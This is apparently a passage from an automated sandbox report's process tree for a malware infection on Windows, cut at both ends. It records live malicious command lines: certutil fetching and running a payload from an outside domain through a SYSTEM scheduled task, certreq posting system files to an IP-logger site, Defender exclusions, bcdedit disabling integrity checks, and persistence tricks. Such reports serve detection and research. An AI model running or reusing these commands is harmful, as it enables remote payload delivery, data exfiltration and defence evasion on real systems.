C:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 564
3⤵
- Program crash
PID:4948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 752
3⤵
- Program crash
PID:2588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 768
3⤵
- Program crash
PID:3224

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
3⤵
PID:4492

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
4⤵
- Modifies data under HKEY_USERS
PID:5132

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /15-15
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:5372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 360
4⤵
- Program crash
PID:5612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 364
4⤵
- Program crash
PID:5704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 400
4⤵
- Program crash
PID:5760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 624
4⤵
- Program crash
PID:5920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 664
4⤵
- Program crash
PID:6012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 704
4⤵
- Program crash
PID:6080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 596
4⤵
- Program crash
PID:6132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 716
4⤵
- Program crash
PID:4276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 704
4⤵
- Program crash
PID:4280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 828
4⤵
- Program crash
PID:5304

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:5364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 856
4⤵
- Program crash
PID:5412

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
4⤵
- Creates scheduled task(s)
PID:5452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 880
4⤵
- Program crash
PID:5752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 836
4⤵
- Program crash
PID:5520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 972
4⤵
- Program crash
PID:5636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 1228
4⤵
- Program crash
PID:5696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 1532
4⤵
- Program crash
PID:5796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 1484
4⤵
- Program crash
PID:6000

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6068

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
5⤵
- Modifies boot configuration data using bcdedit
PID:4308

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
5⤵
- Modifies boot configuration data using bcdedit
PID:7032

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
5⤵
- Modifies boot configuration data using bcdedit
PID:6880

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
5⤵
- Modifies boot configuration data using bcdedit
PID:4560

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
5⤵
- Modifies boot configuration data using bcdedit
PID:6868

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
5⤵
- Modifies boot configuration data using bcdedit
PID:4324

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
5⤵
- Modifies boot configuration data using bcdedit
PID:5464

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
5⤵
- Modifies boot configuration data using bcdedit
PID:6800

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
5⤵
- Modifies boot configuration data using bcdedit
PID:1616

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
5⤵
- Modifies boot configuration data using bcdedit
PID:6852

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
5⤵
- Modifies boot configuration data using bcdedit
PID:6552

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
5⤵
- Modifies boot configuration data using bcdedit
PID:6760

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
5⤵
- Modifies boot configuration data using bcdedit
PID:7284

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy
5⤵
- Modifies boot configuration data using bcdedit
PID:7432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 1608
4⤵
- Program crash
PID:4912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 1504
4⤵
- Program crash
PID:4860

C:\Windows\System32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
4⤵
- Modifies boot configuration data using bcdedit
PID:7672

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
4⤵
PID:5824

C:\Users\Admin\AppData\Local\Temp\30E9.exe
C:\Users\Admin\AppData\Local\Temp\30E9.exe
1⤵
- Executes dropped EXE
PID:860

C:\Users\Admin\AppData\Local\Temp\is-OC8JE.tmp\30E9.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OC8JE.tmp\30E9.tmp" /SL5="$802B6,442598,358912,C:\Users\Admin\AppData\Local\Temp\30E9.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4348

C:\Users\Admin\AppData\Local\Temp\is-0B05F.tmp\kkkk.exe
"C:\Users\Admin\AppData\Local\Temp\is-0B05F.tmp\kkkk.exe" /S /UID=lab212
3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:4344

C:\Program Files\Windows NT\GLZYMDQSUS\prolab.exe
"C:\Program Files\Windows NT\GLZYMDQSUS\prolab.exe" /VERYSILENT
4⤵
- Executes dropped EXE
PID:1512

C:\Users\Admin\AppData\Local\Temp\is-UJ26F.tmp\prolab.tmp
"C:\Users\Admin\AppData\Local\Temp\is-UJ26F.tmp\prolab.tmp" /SL5="$80310,575243,216576,C:\Program Files\Windows NT\GLZYMDQSUS\prolab.exe" /VERYSILENT
5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:3616

C:\Users\Admin\AppData\Local\Temp\b5-e88e7-076-89c90-b7cb0e318cbb1\Toshowesycae.exe
"C:\Users\Admin\AppData\Local\Temp\b5-e88e7-076-89c90-b7cb0e318cbb1\Toshowesycae.exe"
4⤵
- Executes dropped EXE
PID:1468

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o4trkqs4.kzo\GcleanerWW.exe /mixone & exit
5⤵
PID:5484

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1zqovwlv.xl5\privacytools5.exe & exit
5⤵
PID:5824

C:\Users\Admin\AppData\Local\Temp\1zqovwlv.xl5\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\1zqovwlv.xl5\privacytools5.exe
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5980

C:\Users\Admin\AppData\Local\Temp\1zqovwlv.xl5\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\1zqovwlv.xl5\privacytools5.exe
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
PID:5156

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l5srpny5.ccb\setup.exe /8-2222 & exit
5⤵
PID:5708

C:\Users\Admin\AppData\Local\Temp\l5srpny5.ccb\setup.exe
C:\Users\Admin\AppData\Local\Temp\l5srpny5.ccb\setup.exe /8-2222
6⤵
PID:5888

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Ancient-Wave"
7⤵
PID:5776

C:\Program Files (x86)\Ancient-Wave\7za.exe
"C:\Program Files (x86)\Ancient-Wave\7za.exe" e -p154.61.71.13 winamp-plugins.7z
7⤵
PID:6140

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Ancient-Wave\setup.exe" -map "C:\Program Files (x86)\Ancient-Wave\WinmonProcessMonitor.sys""
7⤵
PID:5140

C:\Program Files (x86)\Ancient-Wave\setup.exe
"C:\Program Files (x86)\Ancient-Wave\setup.exe" -map "C:\Program Files (x86)\Ancient-Wave\WinmonProcessMonitor.sys"
8⤵
PID:4408

C:\Program Files (x86)\Ancient-Wave\7za.exe
"C:\Program Files (x86)\Ancient-Wave\7za.exe" e -p154.61.71.13 winamp.7z
7⤵
PID:1072

C:\Program Files (x86)\Ancient-Wave\setup.exe
"C:\Program Files (x86)\Ancient-Wave\setup.exe" /8-2222
7⤵
PID:7484

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5ggsbmpa.joj\MultitimerFour.exe & exit
5⤵
PID:5584

C:\Users\Admin\AppData\Local\Temp\5ggsbmpa.joj\MultitimerFour.exe
C:\Users\Admin\AppData\Local\Temp\5ggsbmpa.joj\MultitimerFour.exe
6⤵
PID:5884

C:\Users\Admin\AppData\Local\Temp\8TW129OFY5\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\8TW129OFY5\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
7⤵
PID:5840

C:\Users\Admin\AppData\Local\Temp\8TW129OFY5\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\8TW129OFY5\multitimer.exe" 1 3.1615014934.60432c169aad2 104
8⤵
PID:4940

C:\Users\Admin\AppData\Local\Temp\8TW129OFY5\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\8TW129OFY5\multitimer.exe" 2 3.1615014934.60432c169aad2
9⤵
PID:5400

C:\Users\Admin\AppData\Local\Temp\40u10n3ue4r\safebits.exe
"C:\Users\Admin\AppData\Local\Temp\40u10n3ue4r\safebits.exe" /S /pubid=1 /subid=451
10⤵
PID:4448

C:\Users\Admin\AppData\Local\Temp\g0d4gb2aiii\oqvh1wbnr3q.exe
"C:\Users\Admin\AppData\Local\Temp\g0d4gb2aiii\oqvh1wbnr3q.exe" /VERYSILENT
10⤵
PID:4440

C:\Users\Admin\AppData\Local\Temp\is-LVV5V.tmp\oqvh1wbnr3q.tmp
"C:\Users\Admin\AppData\Local\Temp\is-LVV5V.tmp\oqvh1wbnr3q.tmp" /SL5="$10384,870426,780800,C:\Users\Admin\AppData\Local\Temp\g0d4gb2aiii\oqvh1wbnr3q.exe" /VERYSILENT
11⤵
PID:5128

C:\Users\Admin\AppData\Local\Temp\is-OJ2PA.tmp\winlthst.exe
"C:\Users\Admin\AppData\Local\Temp\is-OJ2PA.tmp\winlthst.exe" test1 test1
12⤵
PID:6524

C:\Users\Admin\AppData\Local\Temp\YKPDCSw3C.exe
"C:\Users\Admin\AppData\Local\Temp\YKPDCSw3C.exe"
13⤵
PID:6972

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im YKPDCSw3C.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\YKPDCSw3C.exe" & del C:\ProgramData\*.dll & exit
14⤵
PID:8008

C:\Windows\SysWOW64\taskkill.exe
taskkill /im YKPDCSw3C.exe /f
15⤵
- Kills process with taskkill
PID:7380

C:\Users\Admin\AppData\Local\Temp\p1svrpjfm1g\vict.exe
"C:\Users\Admin\AppData\Local\Temp\p1svrpjfm1g\vict.exe" /VERYSILENT /id=535
10⤵
PID:2672

C:\Users\Admin\AppData\Local\Temp\is-31QPR.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-31QPR.tmp\vict.tmp" /SL5="$20364,870426,780800,C:\Users\Admin\AppData\Local\Temp\p1svrpjfm1g\vict.exe" /VERYSILENT /id=535
11⤵
PID:1796

C:\Users\Admin\AppData\Local\Temp\is-7EDIR.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-7EDIR.tmp\wimapi.exe" 535
12⤵
PID:6608

C:\Users\Admin\AppData\Local\Temp\DjSKHd4G3.exe
"C:\Users\Admin\AppData\Local\Temp\DjSKHd4G3.exe"
13⤵
PID:2320

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im DjSKHd4G3.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\DjSKHd4G3.exe" & del C:\ProgramData\*.dll & exit
14⤵
PID:8056

C:\Windows\SysWOW64\taskkill.exe
taskkill /im DjSKHd4G3.exe /f
15⤵
- Kills process with taskkill
PID:5940

C:\Users\Admin\AppData\Local\Temp\45glw0vsqgd\wslw5ru1oip.exe
"C:\Users\Admin\AppData\Local\Temp\45glw0vsqgd\wslw5ru1oip.exe" /ustwo INSTALL
10⤵
PID:1156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1156 -s 656
11⤵
- Program crash
PID:4812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1156 -s 672
11⤵
- Program crash
PID:4292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1156 -s 680
11⤵
- Program crash
PID:6676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1156 -s 812
11⤵
- Program crash
PID:7144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1156 -s 876
11⤵
- Program crash
PID:4508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1156 -s 960
11⤵
- Program crash
PID:5668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1156 -s 1080
11⤵
- Program crash
PID:6932

C:\Users\Admin\AppData\Local\Temp\zaopkfo1em2\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\zaopkfo1em2\askinstall24.exe"
10⤵
PID:1260

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
11⤵
PID:6916

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
12⤵
- Kills process with taskkill
PID:6500

C:\Users\Admin\AppData\Local\Temp\zowjwbwk3ml\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\zowjwbwk3ml\chashepro3.exe" /VERYSILENT
10⤵
PID:5180

C:\Users\Admin\AppData\Local\Temp\is-9CTM3.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-9CTM3.tmp\chashepro3.tmp" /SL5="$3038A,2015144,58368,C:\Users\Admin\AppData\Local\Temp\zowjwbwk3ml\chashepro3.exe" /VERYSILENT
11⤵
PID:3720

C:\Program Files (x86)\JCleaner\8.exe
"C:\Program Files (x86)\JCleaner\8.exe"
12⤵
PID:6128

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c echo grYNxrw
13⤵
PID:6828

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Nemica.sys
13⤵
PID:6820

C:\Windows\SysWOW64\cmd.exe
cmd
14⤵
PID:4544

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"
12⤵
PID:4408

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1EaGq7"
12⤵
PID:4428

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
12⤵
PID:6096

C:\Windows\SysWOW64\certreq.exe
certreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
13⤵
PID:7116

C:\Program Files (x86)\JCleaner\Venita.exe
"C:\Program Files (x86)\JCleaner\Venita.exe"
12⤵
PID:6044

C:\Program Files (x86)\JCleaner\Venita.exe
"{path}"
13⤵
PID:7372

C:\Program Files (x86)\JCleaner\Abbas.exe
"C:\Program Files (x86)\JCleaner\Abbas.exe"
12⤵
PID:4412

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
12⤵
PID:5928

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1aSny7"
12⤵
PID:5596

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
12⤵
PID:5416

C:\Windows\SysWOW64\certreq.exe
certreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
13⤵
PID:7124

C:\Users\Admin\AppData\Local\Temp\gyhzecbwvoi\abekdcwrt0q.exe
"C:\Users\Admin\AppData\Local\Temp\gyhzecbwvoi\abekdcwrt0q.exe" 57a764d042bf8
10⤵
PID:2312

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k "C:\Program Files\W2ODD5ZF4H\W2ODD5ZF4.exe" 57a764d042bf8 & exit
11⤵
PID:6964

C:\Program Files\W2ODD5ZF4H\W2ODD5ZF4.exe
"C:\Program Files\W2ODD5ZF4H\W2ODD5ZF4.exe" 57a764d042bf8
12⤵
PID:6896

C:\Users\Admin\AppData\Local\Temp\dyjypdma133\4mbrjmqb2h1.exe
"C:\Users\Admin\AppData\Local\Temp\dyjypdma133\4mbrjmqb2h1.exe" testparams
10⤵
PID:2264

C:\Users\Admin\AppData\Roaming\pouyalmce52\q41fmb4vin5.exe
"C:\Users\Admin\AppData\Roaming\pouyalmce52\q41fmb4vin5.exe" /VERYSILENT /p=testparams
11⤵
PID:6692

C:\Users\Admin\AppData\Local\Temp\is-J95C0.tmp\q41fmb4vin5.tmp
"C:\Users\Admin\AppData\Local\Temp\is-J95C0.tmp\q41fmb4vin5.tmp" /SL5="$3038C,404973,58368,C:\Users\Admin\AppData\Roaming\pouyalmce52\q41fmb4vin5.exe" /VERYSILENT /p=testparams
12⤵
PID:4644

C:\Users\Admin\AppData\Local\Temp\41sdyr1eqyt\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\41sdyr1eqyt\Setup3310.exe" /Verysilent /subid=577
10⤵
PID:5312

C:\Users\Admin\AppData\Local\Temp\is-PAPI2.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-PAPI2.tmp\Setup3310.tmp" /SL5="$302F8,802346,56832,C:\Users\Admin\AppData\Local\Temp\41sdyr1eqyt\Setup3310.exe" /Verysilent /subid=577
11⤵
PID:5588

C:\Users\Admin\AppData\Local\Temp\is-2ITCO.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-2ITCO.tmp\Setup.exe" /Verysilent
12⤵
PID:4936

C:\Users\Admin\AppData\Local\Temp\3zpjfeoju5c\vpn.exe
"C:\Users\Admin\AppData\Local\Temp\3zpjfeoju5c\vpn.exe" /silent /subid=482
10⤵
PID:5992

C:\Users\Admin\AppData\Local\Temp\is-41M83.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-41M83.tmp\vpn.tmp" /SL5="$1044C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\3zpjfeoju5c\vpn.exe" /silent /subid=482
11⤵
PID:5968

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
12⤵
PID:364

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
13⤵
PID:4284

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
12⤵
PID:4212

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
13⤵
PID:7852

C:\Users\Admin\AppData\Local\Temp\ue02b4um50n\IBInstaller_97039.exe
"C:\Users\Admin\AppData\Local\Temp\ue02b4um50n\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
10⤵
PID:5768

C:\Users\Admin\AppData\Local\Temp\is-0RFL3.tmp\IBInstaller_97039.tmp
"C:\Users\Admin\AppData\Local\Temp\is-0RFL3.tmp\IBInstaller_97039.tmp" /SL5="$203CA,14452723,721408,C:\Users\Admin\AppData\Local\Temp\ue02b4um50n\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
11⤵
PID:6204

C:\Users\Admin\AppData\Local\Temp\is-LP7S3.tmp\{app}\chrome_proxy.exe
"C:\Users\Admin\AppData\Local\Temp\is-LP7S3.tmp\{app}\chrome_proxy.exe"
12⤵
PID:6708

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-LP7S3.tmp\{app}\chrome_proxy.exe"
13⤵
PID:856

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 4
14⤵
- Runs ping.exe
PID:7624

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
12⤵
PID:6696

C:\Users\Admin\AppData\Local\Temp\3733.exe
C:\Users\Admin\AppData\Local\Temp\3733.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:956

C:\Users\Admin\AppData\Local\Temp\3C07.exe
C:\Users\Admin\AppData\Local\Temp\3C07.exe
1⤵
- Executes dropped EXE
PID:4748

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
2⤵
PID:3840

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
3⤵
- Kills process with taskkill
PID:3096

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:5004

C:\Users\Admin\AppData\Local\Temp\AE3A.tmp.exe
C:\Users\Admin\AppData\Local\Temp\AE3A.tmp.exe
1⤵
PID:5884

C:\Users\Admin\AppData\Local\Temp\B0DB.tmp.exe
C:\Users\Admin\AppData\Local\Temp\B0DB.tmp.exe
1⤵
PID:5604

C:\Users\Admin\AppData\Local\Temp\C677.tmp.exe
C:\Users\Admin\AppData\Local\Temp\C677.tmp.exe
1⤵
PID:5972

C:\Users\Admin\AppData\Local\Temp\C677.tmp.exe
C:\Users\Admin\AppData\Local\Temp\C677.tmp.exe
2⤵
PID:7652

C:\Users\Admin\AppData\Local\Temp\D1F2.tmp.exe
C:\Users\Admin\AppData\Local\Temp\D1F2.tmp.exe
1⤵
PID:6396

C:\Users\Admin\AppData\Local\Temp\D1F2.tmp.exe
"{path}"
2⤵
PID:7960

C:\Users\Admin\AppData\Local\Temp\EF7D.tmp.exe
C:\Users\Admin\AppData\Local\Temp\EF7D.tmp.exe
1⤵
PID:7140

C:\Users\Admin\AppData\Local\Temp\is-TTCN7.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-TTCN7.tmp\Setup.tmp" /SL5="$502CA,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-2ITCO.tmp\Setup.exe" /Verysilent
1⤵
PID:4856

C:\Users\Admin\AppData\Local\Temp\is-GG0S2.tmp\ProPlugin.exe
"C:\Users\Admin\AppData\Local\Temp\is-GG0S2.tmp\ProPlugin.exe" /Verysilent
2⤵
PID:5196

C:\Users\Admin\AppData\Local\Temp\is-NNP1V.tmp\ProPlugin.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NNP1V.tmp\ProPlugin.tmp" /SL5="$3041C,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-GG0S2.tmp\ProPlugin.exe" /Verysilent
3⤵
PID:6636

C:\Users\Admin\AppData\Local\Temp\is-0E2CL.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-0E2CL.tmp\Setup.exe"
4⤵
PID:7268

C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"
5⤵
PID:7404

C:\Windows\regedit.exe
regedit /s chrome.reg
6⤵
- Runs .reg file with regedit
PID:6756

C:\Windows\SYSTEM32\TASKKILL.exe
TASKKILL /F /IM chrome.exe
6⤵
- Kills process with taskkill
PID:5176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c chrome64.bat
6⤵
PID:5944

C:\Windows\system32\mshta.exe
mshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)
7⤵
PID:1280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\chrome64.bat" h"
8⤵
PID:3320

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe"
9⤵
PID:7252

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd8,0xdc,0xe0,0xb4,0xe4,0x7ffc34636e00,0x7ffc34636e10,0x7ffc34636e20
10⤵
PID:7804

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1620,17106706259645514003,18410134020337327782,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1680 /prefetch:8
10⤵
PID:5524

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,17106706259645514003,18410134020337327782,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2376 /prefetch:1
10⤵
PID:7188

C:\Program Files\Google\Chrome\Application\chrome.exe
